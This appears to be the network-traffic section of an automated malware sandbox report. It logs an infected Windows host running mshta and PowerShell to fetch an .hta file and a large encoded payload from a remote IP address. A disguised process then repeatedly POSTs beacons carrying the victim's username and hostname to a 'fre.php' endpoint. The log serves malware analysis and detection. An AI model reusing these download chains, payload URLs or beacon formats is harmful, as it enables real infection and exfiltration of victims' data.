                                                                                                  Oct 30, 2024 08:04:32.340296030 CET424INData Raw: 00 38 00 22 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 70 00 65 00 6c 00 6f 00 74 00 61 00 46 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20 00 70 00 65 00 6c 00 6f 00 74 00 61
                                                                                                  Data Ascii: 8" then pelotaFlags = pelotaFlags OR wsman.SessionFlagUTF8 else ' Invalid!
                                                                                                  Oct 30, 2024 08:04:32.340393066 CET1236INData Raw: 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 4e
                                                                                                  Data Ascii: if optDic.ArgumentExists(NPARA_UNENCRYPTED) then ASSERTBOOL optDic.ArgumentExists(NPARA_REMOTE), "Th
                                                                                                  Oct 30, 2024 08:04:32.340404987 CET248INData Raw: 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69
                                                                                                  Data Ascii: end if if optDic.ArgumentExists(NPARA_AUTH) then ASSERTNAL(NPARA_AUTH) authVal = optDic.Ar
                                                                                                  Oct 30, 2024 08:04:32.340418100 CET1236INData Raw: 00 65 00 6e 00 74 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 55 00 54 00 48 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 73 00 65 00 6c 00 65 00 63 00 74 00 20 00 63 00 61 00 73 00 65 00 20 00 4c 00 43 00 61 00 73
                                                                                                  Data Ascii: ent(NPARA_AUTH) select case LCase(authVal) case VAL_NO_AUTH pelotaFlags = pelotaFl
                                                                                                  Oct 30, 2024 08:04:32.340601921 CET1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 55 00 73 00 65 00 20 00 2d 00 75 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 61 00 6e 00 64 00 20 00 2d 00 70 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 2e 00 20 00 20 00 0d
                                                                                                  Data Ascii: 'Use -username and -password. ASSERTBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NP
                                                                                                  Oct 30, 2024 08:04:32.340612888 CET424INData Raw: 00 65 00 20 00 73 00 70 00 65 00 63 00 69 00 66 00 69 00 65 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d 00 61 00 75 00 74 00 68 00 3a 00 64 00 69 00 67 00 65 00 73 00 74 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                  Data Ascii: e specified for '-auth:digest'" ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT
                                                                                                  Oct 30, 2024 08:04:32.340626001 CET1236INData Raw: 00 77 00 73 00 6d 00 61 00 6e 00 2e 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 46 00 6c 00 61 00 67 00 43 00 72 00 65 00 64 00 55 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 20 00 4f 00 52 00 20
                                                                                                  Data Ascii: wsman.SessionFlagCredUsernamePassword OR wsman.SessionFlagUseDigest case VAL_KERBEROS '-use
                                                                                                  Oct 30, 2024 08:04:32.340717077 CET1236INData Raw: 00 46 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20 00 70 00 65 00 6c 00 6f 00 74 00 61 00 46 00 6c 00 61 00 67 00 73 00 20 00 4f 00 52 00 20 00 77 00 73 00 6d 00 61 00 6e 00 2e 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 46 00 6c 00 61 00 67 00 55
                                                                                                  Data Ascii: Flags = pelotaFlags OR wsman.SessionFlagUseNegotiate case VAL_CERT '-certificate is mandato
                                                                                                  Oct 30, 2024 08:04:32.345690012 CET1236INData Raw: 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 70 00 65 00 6c 00 6f 00 74 00 61 00 46 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20 00 70 00 65 00 6c 00 6f 00 74 00 61 00 46 00 6c 00 61
                                                                                                  Data Ascii: pelotaFlags = pelotaFlags OR wsman.SessionFlagUseClientCertificate case VAL_CREDSSP


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.2249174198.46.178.15180364C:\Windows\System32\mshta.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:04:43.430160046 CET464OUTGET /66/gb/greatthingswithmegood.hta HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                  If-Modified-Since: Wed, 30 Oct 2024 04:43:43 GMT
                                                                                                  Connection: Keep-Alive
                                                                                                  Host: 198.46.178.151
                                                                                                  If-None-Match: "2a437-625aa58b90e12"
                                                                                                  Oct 30, 2024 08:04:44.090423107 CET275INHTTP/1.1 304 Not Modified
                                                                                                  Date: Wed, 30 Oct 2024 07:04:44 GMT
                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                  Last-Modified: Wed, 30 Oct 2024 04:43:43 GMT
                                                                                                  ETag: "2a437-625aa58b90e12"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                  Connection: Keep-Alive


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.2249177198.46.178.151804092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:03.066723108 CET76OUTGET /66/LLORG.txt HTTP/1.1
                                                                                                  Host: 198.46.178.151
                                                                                                  Connection: Keep-Alive
                                                                                                  Oct 30, 2024 08:05:03.732826948 CET1236INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 30 Oct 2024 07:05:03 GMT
                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                  Last-Modified: Wed, 30 Oct 2024 04:26:09 GMT
                                                                                                  ETag: "22aac-625aa19ec83cb"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 141996
                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: text/plain
                                                                                                  Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                  Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:03.732888937 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:03.732906103 CET436INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:03.732955933 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:03.732975006 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:03.733105898 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:03.733122110 CET636INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:03.733139992 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:03.733215094 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:03.733278036 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                  Oct 30, 2024 08:05:03.738275051 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77
                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwjX+Y0a2YmQrZiWmJ0MiJkTC9zN3c0IjszRnsyOH9yGDJkQCJkQCJkQCJkQCJkQCJkQCJkQCJkQCJkQCJkQCJkQ+v92oc63s4/2bT0E+AwFGGkQCJpQCp+1BgPASKAKBAd+CJk0XHA+AIkQCJkG5BMQCJkQCgSAQnv


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.224917894.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:06.453717947 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 176
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:06.459100008 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: 'ckav.ruAlbus367706ALBUS-PCk0DE4229FCF97F5879F50F8FD3mg9y5
                                                                                                  Oct 30, 2024 08:05:07.435502052 CET228INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:07 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 15
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.224917994.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:07.642102957 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 176
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:07.647491932 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: 'ckav.ruAlbus367706ALBUS-PC+0DE4229FCF97F5879F50F8FD3ySoqC
                                                                                                  Oct 30, 2024 08:05:08.595205069 CET228INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:08 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 15
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.224918094.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:08.813832045 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:08.819302082 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:09.805161953 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:09 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.2.224918194.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:10.909848928 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:10.915321112 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:11.866259098 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:11 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.2.224918294.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:12.054652929 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:12.060056925 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:13.038114071 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:12 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  10192.168.2.224918394.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:13.561088085 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:13.566514015 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
